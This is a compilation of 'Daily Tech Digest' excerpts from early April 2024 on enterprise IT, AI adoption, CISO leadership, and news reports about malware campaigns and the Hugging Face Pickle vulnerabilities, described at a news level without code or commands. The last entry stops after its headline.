Daily Tech Digest - April 08, 2024

Streamlining application delivery and mitigating risks for critical infrastructure

The emphasis on cloud and edge computing introduces challenges in orchestrating seamless application delivery. The first hurdle is effectively packaging applications for efficient deployment, installation, and execution across various computing environments. For instance, food delivery platforms, such as Zomato or Swiggy, require timely system updates for operational efficiency. The second challenge involves addressing latency and distribution unreliability, especially in scenarios where data transfer delays or inconsistent connectivity may impede the seamless and efficient distribution of applications across networks. Reliability in application upgrades therefore becomes imperative to counter potential disruptions caused by device issues. The third challenge involves maintaining application reliability, which requires continuous performance monitoring. ... The interconnectedness of supply chain applications necessitates a proactive approach to managing complexities, such as addressing software risks. This involves creating a comprehensive bill of materials and recognising dependencies crucial for bundling software into devices or applications.


How can the energy sector bolster its resilience to ransomware attacks?

For energy companies, this means undertaking systematic vulnerability assessments and penetration testing, with a specific focus on applications that interface between IT and OT systems. It also requires adopting a comprehensive security strategy that includes routine security monitoring, patch management and network segmentation, and implementing rigorous incident reporting and response. Once the fundamentals are in place, energy providers should explore more advanced technologies and automation opportunities that can help reduce the time between detection and response, such as AI-powered tools that can actively monitor the network in real time to detect anomalies and predict potential threat patterns. ... In addition to technological defenses, organizations should also focus on the human element, as phishing and social engineering attacks keep targeting employees and third-party contractors and continue to be effective methods for initial intrusion. Training programs that enhance employee awareness of these and other tactics are essential, while regularly updated sessions can help staff identify and respond to potential threats, thereby reducing the likelihood of a successful attack.


Implementing AI Ethics in Business Strategy

In the realm of AI ethics, monitoring and evaluation play a crucial role in ensuring continuous improvement and alignment with ethical standards. By consistently monitoring the outcomes of AI algorithms and evaluating their impact on various stakeholders, organizations can proactively identify ethical concerns and take corrective actions. This dynamic approach not only mitigates potential risks but also fosters a culture of transparency and accountability within the business. Ethical considerations should be integrated into all stages of AI implementation, from design to deployment. Continuous monitoring allows organizations to adapt to changing ethical landscapes, emerging risks, and evolving regulations. ... Emphasizing ethical practices in business is not just a moral obligation but a strategic imperative for long-term success. In today’s interconnected world, consumers are becoming increasingly conscious of the companies they support, favouring those that demonstrate a commitment to ethical values. By prioritizing ethics in decision-making processes and embracing transparency, businesses can build trust with their stakeholders and create sustainable relationships that drive growth.


The 6 Traits You Need To Succeed in the AI-Accelerated Workplace

AI copilots can provide valuable support, but humans need to exercise critical thinking skills to interpret data, make decisions and solve complex problems effectively. For any area of study, there are various levels of understanding. The most basic is "You don't know what you don't know," then comes "You know what you don't know," next up is "You have the knowledge necessary to interact," and the final level is "You are the subject matter expert."  ... Modern-day knowledge workers need to adapt to new technologies and workflows quickly. A great horse rider becomes one with the animal; their movements synchronize naturally. In the same sense, modern-day knowledge workers need to become one with AI assistants and bots, synchronizing and adapting their style and pace of work with all the latest tools and technologies being introduced. ... Resilience is the most important quality an employee can have amid the mist of uncertain future job landscapes. It will equip one with the mental fortitude to embrace innovation, learn new skills, and confidently navigate unfamiliar territories.


Speaking Cyber-Truth: The CISO’s Critical Role in Influencing Reluctant Leadership

It’s not just about pointing out the problems; the CISO must also be a problem-solver. They must work collaboratively with other leaders to find ways to enable the business while protecting it — providing insights and recommendations that allow others to make informed decisions based on the company’s risk appetite and strategic direction. But the effectiveness of a CISO is not measured just by the absence of breaches; it’s also measured by their ability to enable the business to take calculated risks confidently. The CISO must work to ensure that cyber security is built into the DNA of every project. They must advocate and champion secure-by-design principles to ensure that security is not an afterthought but a fundamental component of every initiative. By forcing organizations to acknowledge and address cyber risks proactively, CISOs not only protect the enterprise but also contribute to its resilience and long-term success. CISOs also face the issue of risk prioritization. In an ideal world, every vulnerability would be patched, every threat neutralized, every alert investigated. However, resources are constrained, investments are finite, and not all risks are created equal.


4 Lessons We Learned From The Change Healthcare Cyberattack

Given the massive scale of the Change Healthcare attack, it goes without saying that the aftermath has been chaotic. Providers and pharmacies were forced to expend time and resources on manual claims processing, and many continue to face payment delays that are hurting their cash flow. Change Healthcare’s parent company, insurance giant UnitedHealth Group, has faced widespread criticism for its handling of the attack. The American Hospital Association has been one of the biggest voices in this regard. In the organization’s March 13 letter to the Senate Finance Committee, the AHA wrote that UnitedHealth has done nothing to materially address “the chronic cash flow implications and uncertainty that our nation’s hospitals and physicians are experiencing” as a result of the attack. The long recovery time indicates a potentially poor business continuity plan (BCP), Kellerman noted. In his eyes, every healthcare organization needs a BCP in case of a potential cybersecurity event. “[The plan] should address business continuity in case of crisis or disaster, including backups and the ability to restore them in a timely manner.”


Is HR ready for generative AI? New data says there's a lot of work to do

The potential risks for AI in HR are rooted in a lack of trust and potential bias in AI delivering recommendations or suggestions based on models that may have been unintentionally trained on datasets that reinforce biases. Core HR functions could also be impacted by data compromises, AI hallucinations, bias, and toxicity. The common theme across all these areas of potential risk is the human steps that can mitigate them. AI adoption in HR is on the rise. Valoir research found that 50% of organizations are either currently using or planning to apply AI to recruiting challenges in the next 24 months, followed closely by talent management and training and development. ... Valoir recommends that HR leaders not only select vendors and technologies that can be trusted, but put in place the appropriate policies, procedures, safeguards, and training for both HR staff and the broader employee population. HR departments will need to consider how they communicate those policies and training to both their internal HR teams and the broader population.


The Complexity Cycle: Infrastructure Sprawl is a Killer

We’ve gone from imperative APIs that required hundreds of individual API calls to configure a system to today’s declarative APIs that use only one. It’s easier, of course, but only the interface changed. The hundreds of calls mapped to individual configuration settings still need to be made; you just don’t have to do it yourself. The complexity was abstracted away from you and placed firmly on the system and its developers to deal with. Now, that sounds great, I’m sure, until something goes wrong. And wrong something will go; there’s no avoiding that either. Zero Trust has an “assume breach” principle, and Zero Touch infrastructure (which is where the industry is headed) ought to have a similar principle: “assume failure.” It’s not that complexity evolves. Complexity comes from too many tools, consoles, vendors, environments, architectures, and APIs. As an enterprise evolves, it adds more of these things until complexity overwhelms everyone and some type of abstraction is put in place. We see that abstraction in the rise of multicloud networking, which addresses the complex web of multiple clouds, and of microservices networking, which is trying to unravel the mess inside of microservices architectures.
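The imperative-to-declarative shift the author describes can be sketched in a few lines. This is a hypothetical illustration (the function names are invented, not any vendor's API): the same per-setting calls still happen either way; the declarative form simply moves the loop behind the interface.

```python
def apply_setting(system: dict, key: str, value) -> None:
    # Imperative style: the caller issues one call like this per setting.
    system[key] = value

def apply_desired_state(system: dict, desired: dict) -> None:
    # Declarative style: the caller makes one call with the desired state.
    # The individual configuration calls are still made, just inside the
    # abstraction rather than by the caller.
    for key, value in desired.items():
        apply_setting(system, key, value)

system = {}
desired = {"timeout": 30, "retries": 3, "tls": True}
apply_desired_state(system, desired)
print(system)
```

When the declarative apply fails, the caller has no visibility into which of the hidden per-setting steps went wrong, which is the "assume failure" point the article makes.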


Solar Spider Spins Up New Malware to Entrap Saudi Arabian Financial Firms

JSOutProx is well known in the financial industry. Visa, for example, documented campaigns using the attack tool in 2023, including one pointed at several banks in the Asia-Pacific region, the company stated in its Biannual Threats Report published in December. The remote access Trojan (RAT) is a "highly obfuscated JavaScript backdoor, which has modular plugin capabilities, can run shell commands, download, upload, and execute files, manipulate the file system, establish persistence, take screenshots, and manipulate keyboard and mouse events," Visa stated in its report. "These unique features allow the malware to evade detection by security systems and obtain a variety of sensitive payment and financial information from targeted financial institutions." JSOutProx typically appears as a PDF file of a financial document in a zip archive. But really, it's JavaScript that executes when a victim opens the file. The first stage of the attack collects information on the system and communicates with command-and-control servers obfuscated via dynamic DNS.
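The disguise described here, a script posing as a PDF, often surfaces as a double file extension. As a hedged illustration (an invented helper, not Visa's or any product's actual detection logic), a simple filename check for that pattern might look like:

```python
# Extensions that attackers commonly pair in double-extension lures,
# e.g. "statement.pdf.js": looks like a document, runs as a script.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".wsf", ".hta"}

def looks_like_masquerade(filename: str) -> bool:
    """Flag names whose second-to-last extension is a document type
    but whose real (last) extension is a script type."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False  # fewer than two extensions: not a double-extension lure
    return ("." + parts[1]) in DOCUMENT_EXTS and ("." + parts[2]) in SCRIPT_EXTS

print(looks_like_masquerade("statement.pdf.js"))  # double-extension lure
print(looks_like_masquerade("statement.pdf"))     # ordinary document name
```

A real mail or archive scanner would inspect content types and archive members rather than names alone; this only captures the naming trick the article mentions.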


Biggest AI myths in customer experience

Recent months have seen numerous examples of chatbots going rogue and tarnishing the reputation of the organisations that implemented them. From incorrect refund policies costing a Canadian airline hundreds of dollars to a parcel delivery firm swearing at customers, GenAI is not ready to take off the training wheels just yet. Large language models (LLMs) such as ChatGPT are subject to hallucinations which, without safeguards, could negatively impact the customer experience. Customers would quickly lose patience with brands if they were misled during interactions. A tool that should vastly improve first-contact resolution could achieve the opposite, with customers needing further support to correct previous mistakes. That said, it is possible to reduce the likelihood of egregious chatbot errors through appropriate optimisation techniques.  ... The implementation of AI in CX should be a gradual process. If phase one of AI development was to streamline communications before, during and after interactions, future phases should focus on expanding the scope of the contact centre, encompassing more traditionally back-office and professional roles and creating a hub for communications, relationship building and data orchestration.



Quote for the day:

"To have long-term success as a coach or in any position of leadership, you have to be obsessed in some way." -- Pat Riley

Daily Tech Digest - April 07, 2024

AI advancements are fueling cloud infrastructure spending

The IDC report offers insights into the evolving landscape of cloud deployment infrastructure spending, explicitly focusing on AI. I’m not sure that anyone will push back on that. However, there are some other market dynamics that we should be paying attention to, namely: Tech leaders’ rapid deployment of AI capabilities is changing infrastructure requirements, emphasizing the need for specialized, high-performance hardware. However, this will likely translate quickly into storage and databases, which are more critical to AI than processing. Who would have thunk? The shift towards GPU-heavy servers at higher price points but fewer units sold reflects the evolving market dynamics influenced by the priorities of cloud providers and enterprise tech behemoths. As I pointed out, this could be a false objective that leads many, including the cloud providers, down the wrong path. ... The significant uptick in cloud infrastructure spending underscores a robust investment in AI-related capabilities, which has far-reaching implications for technology and business landscapes.


How to develop your skillset for the AI era

Grounded in a rich understanding of the broader context and enhanced by a diverse skill set, building specialization will ensure that engineers can bring unique insights, creativity, and solutions that AI cannot. It's the intersection of depth and breadth in an engineer's expertise that will define their irreplaceability in an AI-driven world. This is where Roger Martin's Doctrine of Relentless Utility comes into play, a career strategy that focuses on finding your niche and monopolizing it. As you become more adept at navigating between different roles and perspectives, you'll be better positioned to uncover unique opportunities where your particular blend of skills and interests intersect with unmet needs within your team or organization. Aligning what you're good at with areas where you can make a significant impact allows you to establish a distinctive role that plays to your strengths and passions. This strategy promotes an active, value-driven approach, looking for ways to contribute beyond the usual scope of your role. Your niche could be bridging the gap between advanced technical knowledge and non-technical stakeholders or clients.


A phish by any other name should still not be clicked

The proper way for enterprises to reach out on these matters is something like, “There is a new billing matter that requires your attention. Please log into your portal and look into it.” Why don’t most enterprises do that? Some blame a lack of training — and there is absolutely a lot of truth in that. But, it’s often quite deliberate and intentional. More responsible enterprises have tried doing this the proper way, but too many customers complained along the lines of, “Do you know how many portals I have to deal with? Give me a link to the portal you want me to use.” ... This gets us right back to the security-vs.-convenience nightmare. This problem is complicated because the situation is two-step. It’s not that the customer will be hurt if they click on your link. It’s that you’re inadvertently making them comfortable with clicking on an unknown link and they might get hurt two days from now when they encounter an actual phishing attack email. Will the enterprise be held liable, especially if you can’t prove the victim clicked because of what was sent? It gets even worse. The old advice used to be to mouseover suspicious links and make sure they’re legitimate. Today, that advice doesn’t work. 


How to keep humans in charge of AI

First, let users choose guardrails through the marketplace. We should encourage a large multiplicity of fine-tuned models. Different users, journalists, religious groups, civil organizations, governments and anyone else who wants to should be able to easily create customized versions of open-source base models that reflect their values and add their own preferred guardrails. Users should then be free to choose their preferred version of the model whenever they use the tool. This would allow companies that produce the base models to avoid, to the extent possible, having to be the “arbiters of truth” for AI. While this marketplace for fine-tuning and guardrails will lower the pressure on companies to some extent, it doesn’t address the problem of central guardrails. Some content — especially when it comes to images or video — will be so objectionable that it can’t be allowed across any fine-tuned models the company offers. ... How can companies impose centralized guardrails on these issues that apply to all the different fine-tuned models without coming right back to the politics problem Gemini has run head-long into? 


Managers tend to target loyal workers for exploitation, study finds

The researchers hypothesized that managers might view loyal employees as more exploitable, targeting them for exploitation. Alternatively, they considered whether managers might protect loyal workers to retain their allegiance. Four studies were conducted with participants ranging from 211 to 510 full-time managers, recruited via Prolific. In the first study, managers were split into three groups, with the first group reading about a loyal employee named John. The survey then described scenarios requiring someone to work overtime or perform uncomfortable tasks without compensation, querying the likelihood of assigning John to these tasks. The second and third groups underwent similar procedures, but with John described as either disloyal or without any characterization. All participants assessed John’s willingness to make personal sacrifices. ... “Given that workers who agree to participate in their own exploitation also acquire stronger reputations for loyalty, the bidirectional causal links between loyalty and exploitation have the potential to create a vicious circle of suffering for certain workers.” The study sheds light on the relationship between workers’ loyalty and behaviors of managers. 


Mastering the CISO role: Navigating the leadership landscape

CISOs must also cultivate stronger partnerships with their C-suite counterparts. IDC’s survey revealed discrepancies in how CISOs and CIOs perceive the CISO’s role, underscoring the need for better alignment. Creed recounted a recent example where the Allegiant Travel board made decisions about connected aircraft without involving the CISO, leading to a last-minute “fire drill” to address cyber security requirements. “Do you think the board, when they first started talking of going down this path of ‘we’re going to expand the fleet’, considered that there might be security implications in that?” he asked. ... To bridge this gap, CISOs must proactively educate executives on the business implications of security risks and advocate for a seat at the strategic decision-making table. As Russ Trainor, Senior Vice President of IT at the Denver Broncos, suggested, “Sometimes I’ll forward news of the breaches over to my CFO: here’s how much data was exfiltrated, here’s how much we think it cost. Those things tend to hit home.” The evolving CISO role demands a delicate balance of technical expertise, business acumen, and communication prowess. 


How companies are prioritising employee health for organisational success

The HR folks have a critical role in implementing wellness initiatives, believes Ritika. “Fostering a supportive work culture, providing resources for physical and mental health, and advocating for policies that prioritise employee well-being to attract and retain talent effectively are the key responsibilities of HR leaders.” According to Ritika, investing in employee health and well-being is not just a commitment but a cornerstone of organisational ethos. The Human Resource (HR) department plays a pivotal role in promoting and protecting the health of employees within an organisation. As per a report, an alarming 43% of Indian tech workers encounter health issues directly linked to their job responsibilities. Additionally, the study indicates that these health issues go beyond physical ailments, with almost 45% of respondents facing mental health challenges like stress, anxiety, and depression. Samra Rehman, Head of People and Culture, Hero Vired says that HR leaders are responsible for establishing policies and programs that prioritise employee well-being, such as implementing health insurance plans, offering gym memberships or fitness classes, and organising wellness workshops.


Decoding Synchronous and Asynchronous Communication in Cloud-Native Applications

The choice between synchronous and asynchronous communication patterns is not binary but rather a strategic decision based on the specific requirements of the application. Synchronous communication is easy to implement and provides immediate feedback, making it suitable for real-time data access, orchestrating dependent tasks, and maintaining transactional integrity. However, it comes with challenges such as temporal coupling, availability dependency, and network quality impact. On the other hand, asynchronous communication allows a service to initiate a request without waiting for an immediate response, enhancing the system’s responsiveness and scalability. It offers flexibility, making it ideal for scenarios where immediate feedback is not necessary. However, it introduces complexities in resiliency, fault tolerance, distributed tracing, debugging, monitoring, and resource management. In conclusion, designing robust and resilient communication systems for cloud-native applications requires a deep understanding of both synchronous and asynchronous communication patterns. 
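The trade-off above can be sketched with Python's standard library (a toy illustration, not a cloud-native framework): the synchronous caller blocks for its result, while the asynchronous caller enqueues a request, continues working, and collects the result later.

```python
import queue
import threading

def fetch_price_sync(item: str) -> float:
    # Synchronous communication: the caller blocks until this returns.
    return {"widget": 9.99}.get(item, 0.0)

price = fetch_price_sync("widget")  # immediate feedback, temporal coupling

# Asynchronous communication: the caller posts a request to a queue and
# moves on; a worker processes it and posts the result back.
requests: "queue.Queue[str]" = queue.Queue()
results: "queue.Queue[float]" = queue.Queue()

def worker() -> None:
    item = requests.get()               # waits for a request
    results.put(fetch_price_sync(item)) # posts the result back

threading.Thread(target=worker).start()
requests.put("widget")       # initiate without waiting for a response
# ... the caller is free to do other work here ...
async_price = results.get()  # collect the result when it is needed
print(price, async_price)
```

Even in this tiny sketch the asynchronous path needs extra machinery (queues, a worker, a way to correlate results), which is the complexity-in-resiliency-and-tracing cost the article describes.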


Hackers Use Weaponized PDF Files to Deliver Byakugan Malware on Windows

Due to their high level of trust and popularity, hackers frequently use weaponized PDF files as attack vectors. Even PDFs can contain harmful code or exploits that abuse flaws in PDF readers. Once a user unknowingly opens such a malicious PDF, the payload runs and infiltrates the system. ... FortiGuard Labs discovered a Portuguese PDF file distributing the multi-functional Byakugan malware in January 2024. The malicious PDF tricks people into clicking a link by presenting a blurred table. This in turn activates a downloader that drops a copy of itself (require.exe) along with a DLL used for DLL hijacking. It then runs require.exe to retrieve the main module (chrome.exe). Notably, the downloader behaves differently when it is named require.exe and run from the temp folder, an evident evasion technique.


Cybercriminal adoption of browser fingerprinting

While browser fingerprinting has been used by legitimate organizations to uniquely identify web browsers for nearly 15 years, it is now also commonly exploited by cybercriminals: a recent study shows one in four phishing sites using some form of this technique. ... Browser fingerprinting uses a variety of client-side checks to establish browser identities, which can then be used to detect bots or other undesirable web traffic. Numerous pieces of data can be collected as part of fingerprinting, including: time zone, language settings, IP address, cookie settings, screen resolution, browser privacy settings, and the user-agent string. Browser fingerprinting is used by many legitimate providers to detect bots misusing their services and other suspicious activity, but phishing site authors have also realized its benefits and are using the technique to avoid automated systems that might flag their website as phishing. By implementing their own browser fingerprinting controls before loading their site content, threat actors are able to conceal phishing content in real time. For example, Fortra has observed threat actors using browser fingerprinting to bypass the Google Ad review process.
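As a rough server-side sketch (hypothetical code, not Fortra's or any vendor's implementation), signals like those listed above can be canonicalized and hashed into a single identifier, which is essentially what both the legitimate and the malicious uses rely on:

```python
import hashlib
import json

def fingerprint(signals: dict) -> str:
    # Canonicalize with sorted keys so the same set of signals always
    # produces the same identifier, regardless of collection order.
    canonical = json.dumps(signals, sort_keys=True)
    return hashlib.sha256(canonical.encode()).hexdigest()[:16]

# Example client-reported signals (values are illustrative).
visitor = {
    "timezone": "Europe/London",
    "language": "en-GB",
    "screen": "1920x1080",
    "user_agent": "Mozilla/5.0 (...)",
}
print(fingerprint(visitor))
```

A phishing kit using this technique would compare such an identifier against known scanner or bot fingerprints and serve benign content when one matches, which is how the real phishing page stays hidden from review systems.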




Quote for the day:

"What you do has far greater impact than what you say." -- Stephen Covey

Daily Tech Digest - April 06, 2024

'Leadership? No, Thank You': Navigating A New Organizational Environment Model

The culture that pushes people to be leaders frequently sugarcoats a position like that by showing all the advantages, juicy challenges, fancy bonuses and sparkly cars. The reality is that the responsibility is heavy and being a leader is a lot closer to being a psychologist/coach/rescuer/mom/dad than a hands-on worker. A leadership position calls for emotional intelligence growth, great adaptability and, believe it or not, ego detachment. A great leader is one who does not hoard talent but lets people fly, knows that the best team is made of people who are different from and better than they are, learns how to hold pressure and remain calm and, above all, can be trusted. Show workers this truth. ... Sometimes, not wanting a leadership position may indicate simply that one is afraid of it and not that one doesn’t want it. We all know that. Companies can and must push people out of their comfort zones but also need to maintain a balance of respecting their preferences. How? Training them before a leadership role. Yes. Most companies train leaders after they have assumed a leadership role. 


Modern Application Management Requires Deeper Internet Visibility

Unfortunately, most IT teams today have limited ability to discern how the performance of Internet services is impacting their applications. There are, of course, Internet performance management (IPM) tools capable of surfacing network performance metrics. The challenge and opportunity now is to surface those metrics in context with all the other telemetry data that DevOps teams collect from the various application performance management (APM) and observability platforms they rely on to monitor and troubleshoot application environments. ... Broadly, there are three major classes of blind spots that impact distributed application performance. The first and arguably most opaque are the services provided by third-party vendors. Ranging from content delivery networks (CDNs) to software-as-a-service (SaaS) applications, each of these services is controlled by an external service provider that typically doesn’t allow a DevOps team to collect telemetry data by deploying agent software in their IT environments. At best, they may expose an application programming interface (API) to enable an agentless approach to collecting data, but that method doesn’t typically provide the level of control required to optimize application performance.


Ruby on Rails Is Not Dead and May Even Be AI Panacea for Devs

Ruby on Rails has always been promoted as a tool that a single person can use to create a web application — that’s why it was so popular with Web 2.0 entrepreneurs. The Rails website in April 2005 described the framework as “a full-stack, open-source web framework in Ruby for writing real-world applications with joy and less code than most frameworks spend doing XML sit-ups.” While XML is no longer a factor in 2024, DHH continues to do interviews espousing the “joy and less code” philosophy. In an interview with the devtools.fm podcast last month, he even suggested this approach will help developers adapt in the current generative AI era. “As we are now facing perhaps an existential tussle with AI,” he said, “I think it’s never been more important that the way we design programming languages is designed for the human first. The human needs all the help the human can get, if we’re going to have any chance to remain not only just valuable, but relevant as a programmer. And maybe that’s a lost cause anyway, but at least in the last 20 years that I’ve been working with Ruby on Rails, I’ve seen that bet just pay [off] over and over again.”


Business leaders can no longer afford to wait until disruptions occur to measure their financial impact. They need insights to protect the customer and their financial bottom line as quickly and seamlessly as possible. AI and ML provide the means to achieve such agility, offering “quick wins” in the form of immediate financial value. By harnessing accelerators to automate data capture and deliver intelligent insights at the point of disruption, reducing lead time to capture data from several weeks to near real time, they obtain optimized recommendations at the point of disruption across the value network, thus protecting the customer experience and the financial impact on the business in near real time. ... AI contributes to decision intelligence in supply chains. A good example of decision-making processes that have been enhanced by AI is the Amazon Scan, Label, Apply & Manifest (SLAM) process. When a customer places an order, there are multiple microservices and intelligent algorithms that run to find the most optimal way to fulfill it, based on the customer promise and best financial business outcome. 


Is AI driving tech layoffs?

GenAI simply isn’t ready yet. Just like the internet of 1999, the genAI tools of 2024 will eventually get there. But in the meantime, I predict, as Gartner would put it, we’re heading quickly to the “Trough of Disillusionment.” That’s where the initial burst of excitement over a new technology runs out and everyone realizes the reality isn’t close to what we all dreamed it would be. I’ve seen too many of these bubbles over the years and still we fall for it every time. What’s different now, and why the coming fall will hurt so much, is that almost every company has fallen under the genAI spell. Not only are businesses planning to move to it, they’re already replacing the people they need to get their work done with half-baked AI models. This is going to greatly accelerate the coming crash. Don’t get me wrong. GenAI will eventually replace some jobs. But former US Treasury Secretary and current OpenAI board member Larry Summers gets it right. He recently said, “If one takes a view over the next generation, this could be the biggest thing that has happened in economic history since the Industrial Revolution.”


Unlocking the Power of Generative AI in Banking: Insights from Microsoft’s Daragh Morrissey

The first use case I would start with is your developers. It’s the most mature generative AI scenario. And as you build new applications for this, why not build them with generative AI? Then I would think about the out-of-the-box AI, gen AI that you’ll get from us if you start introducing it to Teams and Office. You’ll hit a ton of use cases there that are sort of horizontal across the whole business. Then, you’ll be left with a set of custom use cases. These could be things like a contact center: you could start by just enhancing what you currently have in your contact center. You don’t have to rip out your contact center, either. It’s just about adding the capabilities on top. Building a knowledge base is also a great way of learning how to use this inside the organization. ... One of the things we did as well was create this concept of a citizen developer or citizen data scientist. You could just take a set of data, and we can prompt you to say, “It looks like you need one of these models, that could be sentiment analysis or something.” Then, it will build a model with the data.


Critical Bugs Put Hugging Face AI Platform in a 'Pickle'

In examining Hugging Face's infrastructure and ways to weaponize the bugs they discovered, Wiz researchers found that anyone could easily upload an AI/ML model to the platform, including those based on the Pickle format. Pickle is a widely used module for storing Python objects in a file. Though even the Python Software Foundation itself has deemed Pickle insecure, it remains popular because of its ease of use and the familiarity people have with it. "It is relatively straightforward to craft a PyTorch (Pickle) model that will execute arbitrary code upon loading," according to Wiz. Wiz researchers took advantage of the ability to upload a private Pickle-based model to Hugging Face that would run a reverse shell upon loading. They then interacted with it using the Inference API to achieve shell-like functionality, which the researchers used to explore their environment on Hugging Face's infrastructure. That exercise quickly showed the researchers their model was running in a pod in a cluster on Amazon Elastic Kubernetes Service (EKS). ... With Hugging Face Spaces, Wiz found an attacker could execute arbitrary code during application build time that would let them examine network connections from their machine.
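The "arbitrary code upon loading" behavior comes from pickle's `__reduce__` hook: a serialized object can name any callable, and `pickle.loads` will invoke it at deserialization time. A minimal sketch, using a harmless builtin where a real attack would plant a reverse shell:

```python
import pickle

class MaliciousPayload:
    """Illustrative stand-in for a booby-trapped model file. pickle
    invokes the (callable, args) tuple returned by __reduce__ when
    the blob is loaded, so loading alone runs attacker-chosen code.
    A real attack would return something like
    (os.system, ("curl attacker.example | sh",)) instead of the
    harmless builtin below."""

    def __reduce__(self):
        # harmless demonstration: merely loading the blob calls bytearray()
        return (bytearray, (b"code ran during pickle.loads",))

blob = pickle.dumps(MaliciousPayload())
result = pickle.loads(blob)  # no MaliciousPayload comes back -- the callable ran
```

Note that the loaded object is not a `MaliciousPayload` at all but whatever the callable returned, which is why scanning a Pickle file's declared class names is not a reliable defense.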


Sophisticated Latrodectus Malware Linked to 2017 Strain

While initial analysis suggested Latrodectus is a new variant of IcedID, subsequent research found that it is a new malware most likely named Latrodectus because of a string identified in the code. Latrodectus employs infrastructure used in historic IcedID operations, indicating potential ties to the same threat actors. IcedID, first discovered in 2017, has been described as a banking Trojan and remote access Trojan. Researchers discovered insights into the activities of threat actors TA577 and TA578 - the primary distributors of Latrodectus - that illustrate the evolving tactics threat actors have used over time. TA577, previously known for its distribution of Qbot, used Latrodectus in three campaigns in November 2023 before switching back to Pikabot. In contrast, TA578 has been predominantly distributing Latrodectus since mid-January 2024, using contact forms and impersonation techniques to deliver the malware to targets. Latrodectus functions as a downloader, and its primary objective is to download payloads and execute arbitrary commands. Its sandbox evasion techniques are noteworthy, and it shares similarities with the IcedID malware.


Deceptive AI: The Human-Machine Romance

Like God, AI bots assure us they are omnipresent and omniscient and can be a panacea for all our emotional needs, a claim that is too good to be true. All of us, at different points in our lives, have witnessed miserable bot failures while responding to well-scoped, structured and sequenced business processes. Then how on earth do we even believe a neural network can handle complex, unstructured human emotions? The outcomes will be insanely unpredictable. That is exactly what happened to 21-year-old Jaswant Singh Chail when he was encouraged by a romantic chatbot to break into Windsor Castle to kill the Queen of England. He is now serving a prison sentence, still firmly believing the AI bot is an incarnation of the angel who will eventually reunite with him. Don’t see this scenario in isolation; such AI bots in the hands of extremists can be a game changer in recruiting and radicalizing younger minds to carry out unspeakable crimes (remember the gory effects of the suicidal game “Blue Whale”?); unethical business houses can leverage such channels to boost their product sales.


Six reasons to go colo

Historically, enterprises have built, equipped, and operated their own data centers according to need – both in capacity and in geographical location. While this approach has qualities in terms of being tailor-made for your specific operations – the infrastructure lacks the scalability, flexibility and sometimes even cloud connectivity required to gain and keep a competitive advantage in today’s fast-paced markets. Furthermore, the investments related to constructing your own data center are highly capital-intensive, which makes it difficult for some companies to pursue such a strategy. Against this background, the reasons for the fast-paced growth of the data center colocation industry become easy to grasp. Data center colocation is a considerably more accessible, scalable, and cost-efficient solution for your facility. When using data center colocation, you consume the physical data center ‘as a service’. The often-used expression ‘let your business focus on what it does best’ applies well here. You get the peace of mind of knowing your physical infrastructure has secured uptime, and you leave the matters of cooling, electricity supply and physical security to a partner who is an expert in exactly that.



Quote for the day:

"You may only succeed if you desire succeeding; you may only fail if you do not mind failing." -- Philippos

Daily Tech Digest - April 05, 2024

Time for a Disaster Recovery Health Check

By law, the board and C-level officers have the responsibility of exercising due diligence and competence in the conduct of company operations and the safeguarding of company assets. They do not want to see gaping holes and exposures in corporate due diligence caused by disaster recovery plans that fail to address new security threats or the presence of edge technology. This board awareness can give IT the leverage it needs to prioritize its DR plan update so the revised plan can cover a much broader IT footprint than just the central data center -- and by doing so, address new risks. A good way to present to the board and corporate officers a need to invest time and resources into a DR plan update is to present the need for an update along with the risks of not doing one. This can be accomplished by describing various disaster scenarios that have actually happened to other organizations and explaining how they could plausibly happen to the company itself. By showing real-life situations, the CIO can present the most likely disaster scenarios and consequences and what is needed in terms of plan revisions and investments to minimize those risks.


Mastering HTTP DDoS attack defence: Innovative strategies for web protection

The threat landscape for HTTP DDoS attacks is constantly expanding, with attackers continually developing new techniques to evade detection. Some common methods include using HTTP GET or POST requests to consume server resources, leveraging malformed HTTP headers to confuse web applications, and employing slowloris attacks that open and maintain multiple connections to the server without closing them, eventually exhausting server resources. These attacks can have devastating effects on businesses, including service disruption, loss of customer trust, and significant financial losses. The need for effective mitigation strategies has never been more critical. ... While Radware’s products offer robust protection against HTTP DDoS attacks, it’s essential for businesses to adopt a proactive security posture. Some best practices include:

Regularly updating security systems: Ensure that all security systems are up to date with the latest signatures and detection algorithms.

Implementing access control lists (ACLs): Use ACLs to restrict access to resources, minimising the potential impact of an attack.
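One common mitigation for the slowloris pattern described above is capping the number of connections any single client may hold open at once. A minimal sketch (not drawn from Radware's products; the class name and threshold are illustrative):

```python
from collections import defaultdict

class ConnectionLimiter:
    """Per-IP cap on simultaneous open connections. Slowloris works by
    holding many connections open without completing requests, so a
    hard per-client ceiling bounds the damage a single source can do."""

    def __init__(self, max_per_ip: int = 10):
        self.max_per_ip = max_per_ip
        self.open_conns = defaultdict(int)

    def on_connect(self, ip: str) -> bool:
        if self.open_conns[ip] >= self.max_per_ip:
            return False  # reject: client already holds too many connections
        self.open_conns[ip] += 1
        return True

    def on_disconnect(self, ip: str) -> None:
        self.open_conns[ip] = max(0, self.open_conns[ip] - 1)

limiter = ConnectionLimiter(max_per_ip=3)
results = [limiter.on_connect("203.0.113.5") for _ in range(5)]
# the first three connections are accepted, the remaining two rejected
```

Production mitigations would also enforce header-read timeouts and minimum transfer rates, but the per-IP ceiling illustrates the core idea.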


5 Cybersecurity Questions Boards Can’t Afford To Ignore

When it comes to cybersecurity incident response, companies need to practice, practice, practice. For the board, that could look like ensuring there are not only clear steps in place for what needs to happen should an incident occur but also ensuring that those steps have been practiced ahead of time in some sort of tabletop exercise—similar to how you’d practice exiting the building during a fire drill to know where to go in the event of an emergency. ... While it’s not a requirement, some businesses have decided to add a cybersecurity or technology expert directly to the board to guide them on risk. Businesses can decide if this makes sense for their risk needs depending on their individual risk profiles. Many former CISOs or former cybersecurity leaders are looking to sit on or advise boards, as well as businesses’ own CISOs. ... Directors should also ask themselves if they are budgeting enough for cybersecurity across the organization. They should also work to understand what financial impacts or even regulatory fines they could face if they don't invest in cybersecurity appropriately or report incidents as required. Is your organization investing enough?


Is it Already Too Late to Get Started with GenAI? No, But the Clock’s Ticking

